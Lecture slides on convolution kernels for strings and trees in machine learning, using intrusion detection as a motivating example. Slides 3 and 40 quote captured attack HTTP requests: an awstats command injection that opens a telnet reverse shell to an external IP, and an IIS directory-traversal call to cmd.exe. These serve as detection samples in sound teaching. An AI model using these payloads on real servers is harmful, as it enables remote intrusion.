Lecture 9 Kernel Methods for Structured Inputs
1 Lecture 9: Kernel Methods for Structured Inputs. Pavel Laskov, Blaine Nelson. Cognitive Systems Group, Wilhelm Schickard Institute for Computer Science, Universität Tübingen, Germany. Advanced Topics in Machine Learning, 2012. P. Laskov and B. Nelson (Tübingen) Lecture 9: Learning with Structured Inputs July 3, / 30
2 What We Have Learned So Far. Learning problems are defined in terms of kernel functions reflecting the geometry of the training data. What if the data does not naturally belong to an inner product space?
3 Example: Intrusion Detection
> GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aaccept-language: en\x0d\x0aaccept-encoding: gzip, deflate\x0d\x0acookie: POPUPCHECK= \x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/ \x0d\x0aconnection: keep-alive\x0d\x0ahost: \x0d\x0a
> GET /cgi-bin/awstats.pl?configdir= echo;echo%20yyy;sleep%207200%7ctelnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh%20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%20YYY;echo HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d\x0ahost: wuppi.dyndns.org:80\x0d\x0aconnection: Close\x0d\x0a\x0d\x0a
> GET /Images/200606/tscreen2.gif HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d\x0aaccept-encoding: gzip, deflate\x0d\x0aCookie:.ASPXANONYMOUS=AcaruKtUwo5mMjliZjIxZC1kYzI1LTQyYzQtYTMyNy03YWI2MjlkMjhiZGQ1; CommunityServer-UserCookie1001=lv=5/16/ : 27:01 PM&mra=5/17/2006 9:02:37 AM\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/ \x0d\x0aConnection: keep-alive\x0d\x0ahost:
4 Examples of Structured Input Data: histograms, strings, trees, graphs. [Figure: example structures, including parse trees for the sentences "Jeff ate the apple" and "John hit the red car".]
5 Convolution Kernels in a Nutshell. Decompose structured objects into comparable parts. Aggregate the values of similarity measures for individual parts.
6 R-Convolution. Let X be a set of composite objects (e.g., cars), and X_1, ..., X_D be sets of parts (e.g., wheels, brakes, etc.). All sets are assumed countable. Let R denote the relation "being part of":
R(x̄_1, ..., x̄_D, x) = 1 iff x̄_1, ..., x̄_D are parts of x
The inverse relation R⁻¹ is defined as:
R⁻¹(x) = { x̄ : R(x̄, x) = 1 }
In other words, for each object x, R⁻¹(x) is the set of part tuples that make up x. We say that R is finite if R⁻¹(x) is finite for all x ∈ X.
8 R-Convolution: A Naive Example. [Figure: two cars, an Alfa Romeo Junior and a Lada Niva, decomposed into comparable parts: wheels, headlights, bumpers, transmission, differential, tow coupling, ...]
11 R-Convolution: Further Examples.
- Let x be a D-tuple in X = X_1 × ... × X_D, and let each of the D components of x ∈ X be a part of x. Then R(x̄, x) = 1 iff x̄ = x.
- Let X_1 = X_2 = X be the set of all finite strings over a finite alphabet. Define R((x̄_1, x̄_2), x) = 1 iff x = x̄_1 x̄_2, i.e., x is the concatenation of x̄_1 and x̄_2.
- Let X_1 = ... = X_D = X be a set of ordered, rooted trees of degree D. Define R(x̄, x) = 1 iff x̄_1, ..., x̄_D are the D subtrees of the root of x ∈ X.
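As an illustrative sketch (function names are my own, not from the lecture), the inverse relation R⁻¹(x) for the string-concatenation decomposition can be enumerated directly: every split point of x yields one (prefix, suffix) part pair.

```python
def r_inverse_concat(x):
    """All part pairs (x1, x2) with x = x1 + x2, i.e. R((x1, x2), x) = 1."""
    return [(x[:i], x[i:]) for i in range(len(x) + 1)]

# A string of length n has n + 1 concatenation decompositions,
# including the two with an empty part.
print(r_inverse_concat("abc"))
# [('', 'abc'), ('a', 'bc'), ('ab', 'c'), ('abc', '')]
```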
12 R-Convolution Kernel. Definition. Let x, y ∈ X, and let x̄ and ȳ denote the corresponding tuples of parts. Let K_d(x̄_d, ȳ_d) be a kernel between the d-th parts of x and y (1 ≤ d ≤ D). Then the convolution kernel between x and y is defined as:
K(x, y) = Σ_{x̄ ∈ R⁻¹(x)} Σ_{ȳ ∈ R⁻¹(y)} ∏_{d=1}^{D} K_d(x̄_d, ȳ_d)
14 Examples of R-Convolution Kernels. The RBF kernel is a convolution kernel: let each of the D dimensions of x be a part, and K_d(x_d, y_d) = exp(−(x_d − y_d)²/(2σ²)). Then
K(x, y) = ∏_{d=1}^{D} exp(−(x_d − y_d)²/(2σ²)) = exp(−Σ_{d=1}^{D} (x_d − y_d)²/(2σ²)) = exp(−‖x − y‖²/(2σ²))
The linear kernel K(x, y) = Σ_{d=1}^{D} x_d y_d is not a convolution kernel, except for the trivial single-part decomposition. For any other decomposition, we would need to sum products of more than one term, which contradicts the formula for the linear kernel.
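The RBF identity above can be checked numerically; this sketch (helper names are illustrative) compares the per-dimension product against the closed form:

```python
import math

def rbf_full(x, y, sigma):
    """Closed form: exp(-||x - y||^2 / (2 sigma^2))."""
    return math.exp(-sum((xd - yd) ** 2 for xd, yd in zip(x, y)) / (2 * sigma ** 2))

def rbf_as_convolution(x, y, sigma):
    """Product of one RBF kernel per dimension (one part per dimension;
    the convolution sum has a single term for this trivial decomposition)."""
    prod = 1.0
    for xd, yd in zip(x, y):
        prod *= math.exp(-((xd - yd) ** 2) / (2 * sigma ** 2))
    return prod

x, y = [1.0, 2.0, 3.0], [0.5, 2.5, 2.0]
assert abs(rbf_full(x, y, 1.0) - rbf_as_convolution(x, y, 1.0)) < 1e-12
```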
15 Subset Product Kernel. Theorem. Let K be a kernel on U × U. Then for all finite, non-empty subsets A, B ⊆ U,
K'(A, B) = Σ_{x ∈ A} Σ_{y ∈ B} K(x, y)
is a valid kernel.
16 Subset Product Kernel. Proof. Goal: show that K'(A, B) is an inner product in some space. Recall that for any point u ∈ U, K(u, ·) is a function K_u in some RKHS H. Let f_A = Σ_{u ∈ A} K_u and f_B = Σ_{u ∈ B} K_u. Define
⟨f_A, f_B⟩ := Σ_{x ∈ A} Σ_{y ∈ B} K(x, y)
We need to show that this satisfies the properties of an inner product. Let f_C = Σ_{u ∈ C} K_u. Clearly,
⟨f_A + f_C, f_B⟩ = Σ_{x ∈ A ∪ C} Σ_{y ∈ B} K(x, y) = Σ_{x ∈ A} Σ_{y ∈ B} K(x, y) + Σ_{x ∈ C} Σ_{y ∈ B} K(x, y) = ⟨f_A, f_B⟩ + ⟨f_C, f_B⟩
The other properties of the inner product can be proved similarly.
17 Back to the R-Convolution Kernel. Theorem.
K(x, y) = Σ_{x̄ ∈ R⁻¹(x)} Σ_{ȳ ∈ R⁻¹(y)} ∏_{d=1}^{D} K_d(x̄_d, ȳ_d)
is a valid kernel.
18 Back to the R-Convolution Kernel. Proof. Let U = X_1 × ... × X_D. From the closure of kernels under the tensor product, it follows that
K(x̄, ȳ) = ∏_{d=1}^{D} K_d(x̄_d, ȳ_d)
is a kernel on U × U. Applying the Subset Product Kernel Theorem with A = R⁻¹(x) and B = R⁻¹(y), the theorem's claim follows.
19 End of Theory
20 Convolution Kernels for Strings. Let x, y ∈ A* be two strings over the alphabet A. How can we define K(x, y) using the ideas of convolution kernels?
22 Convolution Kernels for Strings. Let x, y ∈ A* be two strings over the alphabet A. How can we define K(x, y) using the ideas of convolution kernels? Let D = 1, and take X_1 to be the set of all strings of length n ("n-grams") over the alphabet A: X_1 = A^n. For any x ∈ A* and any x̄ ∈ X_1, define R(x̄, x) = 1 iff x̄ is a substring of x. Then R⁻¹(x) is the set of all n-grams contained in x. Define K(x̄, ȳ) = 1_[x̄ = ȳ]. Then:
K(x, y) = Σ_{x̄ ∈ R⁻¹(x)} Σ_{ȳ ∈ R⁻¹(y)} 1_[x̄ = ȳ]
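A minimal sketch of this n-gram convolution kernel (names are illustrative; R⁻¹(x) is modeled as a Python set, so the double sum counts matches over distinct n-grams):

```python
def ngrams(x, n):
    """R^{-1}(x): the set of distinct n-grams contained in x."""
    return {x[i:i + n] for i in range(len(x) - n + 1)}

def ngram_kernel(x, y, n):
    """Convolution kernel: sum of 1[xbar == ybar] over R^{-1}(x) x R^{-1}(y)."""
    return sum(1 for xb in ngrams(x, n) for yb in ngrams(y, n) if xb == yb)

# The two strings share exactly the 2-grams "ra" and "ak".
print(ngram_kernel("abrakadabra", "barakobama", 2))
# 2
```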
23 Convolution Kernels for Strings (ctd.) An alternative definition of a kernel for two strings can be obtained as follows: Let D = 1, and take X_1 to be the set of all strings of arbitrary length over the alphabet A: |X_1| = ∞. For any x ∈ A* and any x̄ ∈ X_1, define R(x̄, x) = 1 iff x̄ is a substring of x. Then R⁻¹(x) is the set of all substrings contained in x. Define K(x̄, ȳ) = 1_[x̄ = ȳ]. Then:
K(x, y) = Σ_{x̄ ∈ R⁻¹(x)} Σ_{ȳ ∈ R⁻¹(y)} 1_[x̄ = ȳ]
Notice that the size of the summation remains finite despite the infinite dimensionality of X_1.
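The finiteness observation can be made concrete: even though X_1 is infinite, R⁻¹(x) contains at most O(|x|²) distinct substrings, so the double sum is always finite. A hedged sketch (function names are my own):

```python
def all_substrings(x):
    """R^{-1}(x) for arbitrary-length features: finite despite |X_1| = infinity."""
    return {x[i:j] for i in range(len(x)) for j in range(i + 1, len(x) + 1)}

def substring_kernel(x, y):
    """Number of distinct substrings shared by x and y."""
    return len(all_substrings(x) & all_substrings(y))

# "abab" and "ba" share the substrings "a", "b", and "ba".
print(substring_kernel("abab", "ba"))
# 3
```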
24 Geometry of String Kernels. [Figure: four example sequences (1. "blabla blubla blablabu aa", 2. "bla blablaa bulab bb abla", 3. "a blabla blabla ablub bla", 4. "blab blab abba blabla blu") are decomposed into subsequences; histograms of subsequence counts over features such as b, a, bb, aa, bla, blu, abba, abla, blab, ablub, bulab, blabla, blablu, blablaa, blablabu then embed the four sequences as points in a feature space.]
25 Metric Embedding of Strings. Define the language S ⊆ A* of possible features, e.g., n-grams, words, or all subsequences. For each sequence x, count the occurrences of each feature in it:
φ : x ↦ (φ_s(x))_{s ∈ S}
Use φ_s(x) as the s-th coordinate of x in the vector space of dimensionality |S|. Define K(x, y) := ⟨φ(x), φ(y)⟩. This is equivalent to K(x, y) defined by the convolution kernel!
26 Similarity Measures for Embedded Strings. Metric embedding enables the application of various vectorial similarity measures over sequences, e.g.:
Kernels K(x, y):
- Linear: Σ_{s ∈ S} φ_s(x) φ_s(y)
- RBF: exp(−d(x, y)²/σ)
Similarity coefficients: Jaccard, Kulczynski, ...
Distances d(x, y):
- Manhattan: Σ_{s ∈ S} |φ_s(x) − φ_s(y)|
- Minkowski: (Σ_{s ∈ S} |φ_s(x) − φ_s(y)|^k)^{1/k}
- Hamming: Σ_{s ∈ S} sgn |φ_s(x) − φ_s(y)|
- Chebyshev: max_{s ∈ S} |φ_s(x) − φ_s(y)|
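A few of the listed distances, sketched over 1-gram count embeddings (a minimal illustration; Counter returns 0 for absent features, which keeps the union-based sums simple):

```python
from collections import Counter

def embed(x, n=1):
    """phi: count occurrences of each n-gram feature in x."""
    return Counter(x[i:i + n] for i in range(len(x) - n + 1))

def manhattan(px, py):
    return sum(abs(px[s] - py[s]) for s in set(px) | set(py))

def chebyshev(px, py):
    return max(abs(px[s] - py[s]) for s in set(px) | set(py))

def hamming(px, py):
    # number of features whose counts differ (sgn of the absolute difference)
    return sum(1 for s in set(px) | set(py) if px[s] != py[s])

px, py = embed("abrakadabra"), embed("barakobama")
print(manhattan(px, py), chebyshev(px, py), hamming(px, py))
# 5 1 5
```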
29 Embedding example. X = abrakadabra, Y = barakobama.
1-grams:
s   φ_s(X)  φ_s(Y)  product
a   5       4       20
b   2       2       4
d   1       0       0
k   1       1       1
m   0       1       0
o   0       1       0
r   2       1       2
⟨φ(X), φ(Y)⟩ = 27
2-grams:
s   φ_s(X)  φ_s(Y)  product
ab  2       0       0
ad  1       0       0
ak  1       1       1
am  0       1       0
ar  0       1       0
ba  0       2       0
br  2       0       0
da  1       0       0
ka  1       0       0
ko  0       1       0
ma  0       1       0
ob  0       1       0
ra  2       1       2
⟨φ(X), φ(Y)⟩ = 3
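The rows of the table can be recomputed mechanically. This sketch computes the plain, unnormalized dot products of the count vectors; the two totals it prints follow directly from the per-feature counts of the two example strings:

```python
from collections import Counter

def gram_counts(x, n):
    """Counts of each n-gram occurring in x."""
    return Counter(x[i:i + n] for i in range(len(x) - n + 1))

def dot(px, py):
    """Inner product of two sparse count vectors."""
    return sum(px[s] * py[s] for s in px)

X, Y = "abrakadabra", "barakobama"
print(dot(gram_counts(X, 1), gram_counts(Y, 1)))  # 1-gram inner product: 27
print(dot(gram_counts(X, 2), gram_counts(Y, 2)))  # 2-gram inner product: 3
```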
31 Implementation of String Kernels. General observations: The embedding space has huge dimensionality but is very sparse; at most a linear number of entries is non-zero in each sample. Computation of similarity measures requires operations on either the intersection or the union of the sets of non-zero features in each sample. Implementation strategies: Explicit but sparse representation of feature vectors: sorted arrays or hash tables. Implicit and general representations: tries, suffix trees, suffix arrays.
32 String Kernels using Sorted Arrays. Store all features in sorted arrays. Traverse the feature arrays of two samples to find matching elements:
φ(x): aa (3), ab (2), bc (2), cc (1)
φ(z): ab (3), ba (2), bb (1), bc (4)
Running time: Sorting: O(n). Comparison: O(n).
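The linear-time comparison can be written as a single merge pass over the two sorted arrays (the example arrays below are the slide's own φ(x) and φ(z); the function name is illustrative):

```python
def kernel_sorted(fx, fy):
    """Linear kernel via a merge over two sorted (feature, count) arrays."""
    i = j = 0
    total = 0
    while i < len(fx) and j < len(fy):
        if fx[i][0] == fy[j][0]:
            total += fx[i][1] * fy[j][1]   # matching feature: multiply counts
            i += 1
            j += 1
        elif fx[i][0] < fy[j][0]:
            i += 1                         # feature only in x: skip
        else:
            j += 1                         # feature only in z: skip
    return total

phi_x = [("aa", 3), ("ab", 2), ("bc", 2), ("cc", 1)]
phi_z = [("ab", 3), ("ba", 2), ("bb", 1), ("bc", 4)]
print(kernel_sorted(phi_x, phi_z))
# 14  (ab: 2*3 + bc: 2*4)
```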
37 String Kernels using Generalized Suffix Trees. 2-gram counts for abbaa and baaaa: aa: 1 and 3, ab: 1 and 0, ba: 1 and 1, bb: 1 and 0. [Figure: generalized suffix tree built over abbaa# and baaaa$; the per-string occurrence counts of matching 2-grams are read off its nodes.]
38 Tree Kernels: Motivation. Trees are ubiquitous representations in various applications: Parsing: parse trees. Content representation: XML, DOM. Bioinformatics: phylogeny. Ad-hoc features related to trees, e.g. the number of nodes or edges, are not informative for learning. Structural properties of trees, on the other hand, may be very discriminative.
39 Example: Normal HTTP Request.
GET /test.gif HTTP/1.1<NL>
Accept: */*<NL>
Accept-Language: en<NL>
Referer:<NL>
Connection: keep-alive<NL>
[Figure: parse tree of the request: <httpsession> → <request> → <method> (GET), <uri> (<path> /test.gif), <version> (HTTP/1.1), and <reqhdr> with <hdr> nodes decomposing into <hdrkey>/<hdrval> pairs for Accept, Referer, and Connection.]
40 Example: Malicious HTTP Request.
GET /scripts/..%%35c../cmd.exe?/c+dir+c:\ HTTP/1.0
[Figure: parse tree of the request: <httpsession> → <request> → <method> (GET), <uri> (<path> /scripts/..%%35c../cmd.exe with a <getparamlist> containing a <getparam> whose <getkey> is /c+dir+c:\), and <version> (HTTP/1.0).]
42 Convolution Kernels for Trees. Similarly to strings, we can define kernels for trees using the convolution kernel framework: Let D = 1 and X_1 = X be the set of all trees, |X_1| = |X| = ∞. For any x ∈ X and any x̄ ∈ X_1, define R(x̄, x) = 1 iff x̄ ⊑ x, i.e., x̄ is a subtree of x. Then R⁻¹(x) is the set of all subtrees contained in x. Define K(x̄, ȳ) = 1_[x̄ = ȳ]. Then:
K(x, y) = Σ_{x̄ ∈ R⁻¹(x)} Σ_{ȳ ∈ R⁻¹(y)} 1_[x̄ = ȳ]
Problem: Testing for equality between two trees may be extremely costly!
44 Recursive Computation of Tree Kernels. Two useful facts:
- Transitivity of the subtree relation: x̄ ⊑ x̂ and x̂ ⊑ x imply x̄ ⊑ x.
- Necessary condition for equality: two trees are equal only if all of their subtrees are equal.
Recursive scheme: Let Ch(x̄) denote the set of immediate children of the root of (sub)tree x̄, and let |x̄| := |Ch(x̄)|.
- If Ch(x̄) ≠ Ch(ȳ), return 0.
- If x̄ = ȳ, return 1.
- Otherwise return K(x̄, ȳ) = ∏_{i=1}^{|x̄|} (1 + K(x̄_i, ȳ_i))
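A literal-minded sketch of the recursive scheme (the tuple-based tree representation, and the label/arity test standing in for the Ch(x̄) ≠ Ch(ȳ) check, are my assumptions, not the lecture's):

```python
def tree_kernel(x, y):
    """Recursive subtree-matching scheme from the slides. Trees are
    (label, child, child, ...) tuples; leaves are plain label strings."""
    if x == y:
        return 1                       # identical (sub)trees match exactly
    if isinstance(x, str) or isinstance(y, str):
        return 0                       # a leaf matches only an identical leaf
    if x[0] != y[0] or len(x) != len(y):
        return 0                       # root labels or child lists differ
    prod = 1
    for xi, yi in zip(x[1:], y[1:]):   # product of (1 + K) over child pairs
        prod *= 1 + tree_kernel(xi, yi)
    return prod

t1 = ("S", ("NP", "John"), ("VP", "runs"))
t2 = ("S", ("NP", "Mary"), ("VP", "runs"))
print(tree_kernel(t1, t2))
# 4  = (1 + 1) * (1 + 1): the NP skeleton and the full VP subtree both match
```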
48 Computation of Recursive Clause.
- Find a pair of nodes with identical subsets of children.
- Add one for the nodes themselves (subtrees of cardinality 1).
- Add counts for all matching subtrees.
- Multiply together and return the total count.
49 Summary. Kernels for structured data extend learning methods to a vast variety of practical data types. A generic framework for handling structured data is offered by convolution kernels. Special data structures and algorithms are needed for efficiency. Extensive range of applications: natural language processing, bioinformatics, computer security.
50 Bibliography I
[1] M. Collins and N. Duffy. Convolution kernels for natural language. In Advances in Neural Information Processing Systems (NIPS), volume 16.
[2] D. Haussler. Convolution kernels on discrete structures. Technical Report UCSC-CRL-99-10, UC Santa Cruz, July 1999.
[3] K. Rieck and P. Laskov. Linear-time computation of similarity measures for sequential data. Journal of Machine Learning Research, 9:23-48, 2008.
Properties of Context-free Languages Reading: Chapter 7 1 Topics 1) Simplifying CFGs, Normal forms 2) Pumping lemma for CFLs 3) Closure and decision properties of CFLs 2 How to simplify CFGs? 3 Three ways
More informationEdge Isoperimetric Theorems for Integer Point Arrays
Edge Isoperimetric Theorems for Integer Point Arrays R. Ahlswede, S.L. Bezrukov Universität Bielefeld, Fakultät für Mathematik Postfach 100131, 33501 Bielefeld, Germany Abstract We consider subsets of
More informationMATH 31BH Homework 1 Solutions
MATH 3BH Homework Solutions January 0, 04 Problem.5. (a) (x, y)-plane in R 3 is closed and not open. To see that this plane is not open, notice that any ball around the origin (0, 0, 0) will contain points
More informationSets are one of the basic building blocks for the types of objects considered in discrete mathematics.
Section 2.1 Introduction Sets are one of the basic building blocks for the types of objects considered in discrete mathematics. Important for counting. Programming languages have set operations. Set theory
More informationEven More on Dynamic Programming
Algorithms & Models of Computation CS/ECE 374, Fall 2017 Even More on Dynamic Programming Lecture 15 Thursday, October 19, 2017 Sariel Har-Peled (UIUC) CS374 1 Fall 2017 1 / 26 Part I Longest Common Subsequence
More informationClosure Properties of Regular Languages. Union, Intersection, Difference, Concatenation, Kleene Closure, Reversal, Homomorphism, Inverse Homomorphism
Closure Properties of Regular Languages Union, Intersection, Difference, Concatenation, Kleene Closure, Reversal, Homomorphism, Inverse Homomorphism Closure Properties Recall a closure property is a statement
More informationFinal. Introduction to Artificial Intelligence. CS 188 Spring You have approximately 2 hours and 50 minutes.
CS 188 Spring 2014 Introduction to Artificial Intelligence Final You have approximately 2 hours and 50 minutes. The exam is closed book, closed notes except your two-page crib sheet. Mark your answers
More informationProblem Set 2: Solutions Math 201A: Fall 2016
Problem Set 2: s Math 201A: Fall 2016 Problem 1. (a) Prove that a closed subset of a complete metric space is complete. (b) Prove that a closed subset of a compact metric space is compact. (c) Prove that
More informationCSCI 2200 Foundations of Computer Science Spring 2018 Quiz 3 (May 2, 2018) SOLUTIONS
CSCI 2200 Foundations of Computer Science Spring 2018 Quiz 3 (May 2, 2018) SOLUTIONS 1. [6 POINTS] For language L 1 = {0 n 1 m n, m 1, m n}, which string is in L 1? ANSWER: 0001111 is in L 1 (with n =
More informationFall, 2017 CIS 262. Automata, Computability and Complexity Jean Gallier Solutions of the Practice Final Exam
Fall, 2017 CIS 262 Automata, Computability and Complexity Jean Gallier Solutions of the Practice Final Exam December 6, 2017 Problem 1 (10 pts). Let Σ be an alphabet. (1) What is an ambiguous context-free
More informationA Result of Vapnik with Applications
A Result of Vapnik with Applications Martin Anthony Department of Statistical and Mathematical Sciences London School of Economics Houghton Street London WC2A 2AE, U.K. John Shawe-Taylor Department of
More informationComputational Models #1
Computational Models #1 Handout Mode Nachum Dershowitz & Yishay Mansour March 13-15, 2017 Nachum Dershowitz & Yishay Mansour Computational Models #1 March 13-15, 2017 1 / 41 Lecture Outline I Motivation
More informationLecture Notes On THEORY OF COMPUTATION MODULE -1 UNIT - 2
BIJU PATNAIK UNIVERSITY OF TECHNOLOGY, ODISHA Lecture Notes On THEORY OF COMPUTATION MODULE -1 UNIT - 2 Prepared by, Dr. Subhendu Kumar Rath, BPUT, Odisha. UNIT 2 Structure NON-DETERMINISTIC FINITE AUTOMATA
More informationComputational Models - Lecture 4 1
Computational Models - Lecture 4 1 Handout Mode Iftach Haitner and Yishay Mansour. Tel Aviv University. April 3/8, 2013 1 Based on frames by Benny Chor, Tel Aviv University, modifying frames by Maurice
More informationSection 1.3 Ordered Structures
Section 1.3 Ordered Structures Tuples Have order and can have repetitions. (6,7,6) is a 3-tuple () is the empty tuple A 2-tuple is called a pair and a 3-tuple is called a triple. We write (x 1,, x n )
More informationCSci 311, Models of Computation Chapter 4 Properties of Regular Languages
CSci 311, Models of Computation Chapter 4 Properties of Regular Languages H. Conrad Cunningham 29 December 2015 Contents Introduction................................. 1 4.1 Closure Properties of Regular
More informationSection 1 (closed-book) Total points 30
CS 454 Theory of Computation Fall 2011 Section 1 (closed-book) Total points 30 1. Which of the following are true? (a) a PDA can always be converted to an equivalent PDA that at each step pops or pushes
More information1 More finite deterministic automata
CS 125 Section #6 Finite automata October 18, 2016 1 More finite deterministic automata Exercise. Consider the following game with two players: Repeatedly flip a coin. On heads, player 1 gets a point.
More informationOn the Sizes of Decision Diagrams Representing the Set of All Parse Trees of a Context-free Grammar
Proceedings of Machine Learning Research vol 73:153-164, 2017 AMBN 2017 On the Sizes of Decision Diagrams Representing the Set of All Parse Trees of a Context-free Grammar Kei Amii Kyoto University Kyoto
More informationCS6901: review of Theory of Computation and Algorithms
CS6901: review of Theory of Computation and Algorithms Any mechanically (automatically) discretely computation of problem solving contains at least three components: - problem description - computational
More informationComplexity Theory VU , SS The Polynomial Hierarchy. Reinhard Pichler
Complexity Theory Complexity Theory VU 181.142, SS 2018 6. The Polynomial Hierarchy Reinhard Pichler Institut für Informationssysteme Arbeitsbereich DBAI Technische Universität Wien 15 May, 2018 Reinhard
More informationWhat Is a Language? Grammars, Languages, and Machines. Strings: the Building Blocks of Languages
Do Homework 2. What Is a Language? Grammars, Languages, and Machines L Language Grammar Accepts Machine Strings: the Building Blocks of Languages An alphabet is a finite set of symbols: English alphabet:
More informationOutline. Complexity Theory EXACT TSP. The Class DP. Definition. Problem EXACT TSP. Complexity of EXACT TSP. Proposition VU 181.
Complexity Theory Complexity Theory Outline Complexity Theory VU 181.142, SS 2018 6. The Polynomial Hierarchy Reinhard Pichler Institut für Informationssysteme Arbeitsbereich DBAI Technische Universität
More informationarxiv: v1 [cs.ds] 9 Apr 2018
From Regular Expression Matching to Parsing Philip Bille Technical University of Denmark phbi@dtu.dk Inge Li Gørtz Technical University of Denmark inge@dtu.dk arxiv:1804.02906v1 [cs.ds] 9 Apr 2018 Abstract
More informationCSE 202 Homework 4 Matthias Springer, A
CSE 202 Homework 4 Matthias Springer, A99500782 1 Problem 2 Basic Idea PERFECT ASSEMBLY N P: a permutation P of s i S is a certificate that can be checked in polynomial time by ensuring that P = S, and
More informationHarvard CS 121 and CSCI E-207 Lecture 10: CFLs: PDAs, Closure Properties, and Non-CFLs
Harvard CS 121 and CSCI E-207 Lecture 10: CFLs: PDAs, Closure Properties, and Non-CFLs Harry Lewis October 8, 2013 Reading: Sipser, pp. 119-128. Pushdown Automata (review) Pushdown Automata = Finite automaton
More informationMachine Learning: The Perceptron. Lecture 06
Machine Learning: he Perceptron Razvan C. Bunescu School of Electrical Engineering and Computer Science bunescu@ohio.edu 1 McCulloch-Pitts Neuron Function 0 1 w 0 activation / output function 1 w 1 w w
More informationCS 455/555: Mathematical preliminaries
CS 455/555: Mathematical preliminaries Stefan D. Bruda Winter 2019 SETS AND RELATIONS Sets: Operations: intersection, union, difference, Cartesian product Big, powerset (2 A ) Partition (π 2 A, π, i j
More informationMapping kernels defined over countably infinite mapping systems and their application
Journal of Machine Learning Research 20 (2011) 367 382 Asian Conference on Machine Learning Mapping kernels defined over countably infinite mapping systems and their application Kilho Shin yshin@ai.u-hyogo.ac.jp
More informationCS3719 Theory of Computation and Algorithms
CS3719 Theory of Computation and Algorithms Any mechanically (automatically) discretely computation of problem solving contains at least three components: - problem description - computational tool - analysis
More informationChapter Summary. Sets The Language of Sets Set Operations Set Identities Functions Types of Functions Operations on Functions Computability
Chapter 2 1 Chapter Summary Sets The Language of Sets Set Operations Set Identities Functions Types of Functions Operations on Functions Computability Sequences and Summations Types of Sequences Summation
More informationAutomata and Languages
Automata and Languages Prof. Mohamed Hamada Software Engineering Lab. The University of Aizu Japan Mathematical Background Mathematical Background Sets Relations Functions Graphs Proof techniques Sets
More informationFast Kernels for String and Tree Matching
Fast Kernels for String and Tree Matching S. V. N. Vishwanathan Dept. of Comp. Sci. & Automation Indian Institute of Science Bangalore, 560012, India vishy@csa.iisc.ernet.in Alexander J. Smola Machine
More informationAutomata & languages. A primer on the Theory of Computation. Laurent Vanbever. ETH Zürich (D-ITET) October,
Automata & languages A primer on the Theory of Computation Laurent Vanbever www.vanbever.eu ETH Zürich (D-ITET) October, 5 2017 Part 3 out of 5 Last week, we learned about closure and equivalence of regular
More informationPart 3 out of 5. Automata & languages. A primer on the Theory of Computation. Last week, we learned about closure and equivalence of regular languages
Automata & languages A primer on the Theory of Computation Laurent Vanbever www.vanbever.eu Part 3 out of 5 ETH Zürich (D-ITET) October, 5 2017 Last week, we learned about closure and equivalence of regular
More informationInformation Theory and Statistics Lecture 2: Source coding
Information Theory and Statistics Lecture 2: Source coding Łukasz Dębowski ldebowsk@ipipan.waw.pl Ph. D. Programme 2013/2014 Injections and codes Definition (injection) Function f is called an injection
More informationPartial cubes: structures, characterizations, and constructions
Partial cubes: structures, characterizations, and constructions Sergei Ovchinnikov San Francisco State University, Mathematics Department, 1600 Holloway Ave., San Francisco, CA 94132 Abstract Partial cubes
More informationSupport Vector Machines (SVM) in bioinformatics. Day 1: Introduction to SVM
1 Support Vector Machines (SVM) in bioinformatics Day 1: Introduction to SVM Jean-Philippe Vert Bioinformatics Center, Kyoto University, Japan Jean-Philippe.Vert@mines.org Human Genome Center, University
More informationWith Question/Answer Animations. Chapter 2
With Question/Answer Animations Chapter 2 Chapter Summary Sets The Language of Sets Set Operations Set Identities Functions Types of Functions Operations on Functions Sequences and Summations Types of
More informationEinführung in die Computerlinguistik
Einführung in die Computerlinguistik Context-Free Grammars (CFG) Laura Kallmeyer Heinrich-Heine-Universität Düsseldorf Summer 2016 1 / 22 CFG (1) Example: Grammar G telescope : Productions: S NP VP NP
More informationBefore We Start. The Pumping Lemma. Languages. Context Free Languages. Plan for today. Now our picture looks like. Any questions?
Before We Start The Pumping Lemma Any questions? The Lemma & Decision/ Languages Future Exam Question What is a language? What is a class of languages? Context Free Languages Context Free Languages(CFL)
More informationKernel Methods & Support Vector Machines
Kernel Methods & Support Vector Machines Mahdi pakdaman Naeini PhD Candidate, University of Tehran Senior Researcher, TOSAN Intelligent Data Miners Outline Motivation Introduction to pattern recognition
More informationMathematics 114L Spring 2018 D.A. Martin. Mathematical Logic
Mathematics 114L Spring 2018 D.A. Martin Mathematical Logic 1 First-Order Languages. Symbols. All first-order languages we consider will have the following symbols: (i) variables v 1, v 2, v 3,... ; (ii)
More informationKernel methods, kernel SVM and ridge regression
Kernel methods, kernel SVM and ridge regression Le Song Machine Learning II: Advanced Topics CSE 8803ML, Spring 2012 Collaborative Filtering 2 Collaborative Filtering R: rating matrix; U: user factor;
More informationLecture 7 Properties of regular languages
Lecture 7 Properties of regular languages COT 4420 Theory of Computation Section 4.1 Closure properties of regular languages If L 1 and L 2 are regular languages, then we prove that: Union: L 1 L 2 Concatenation:
More information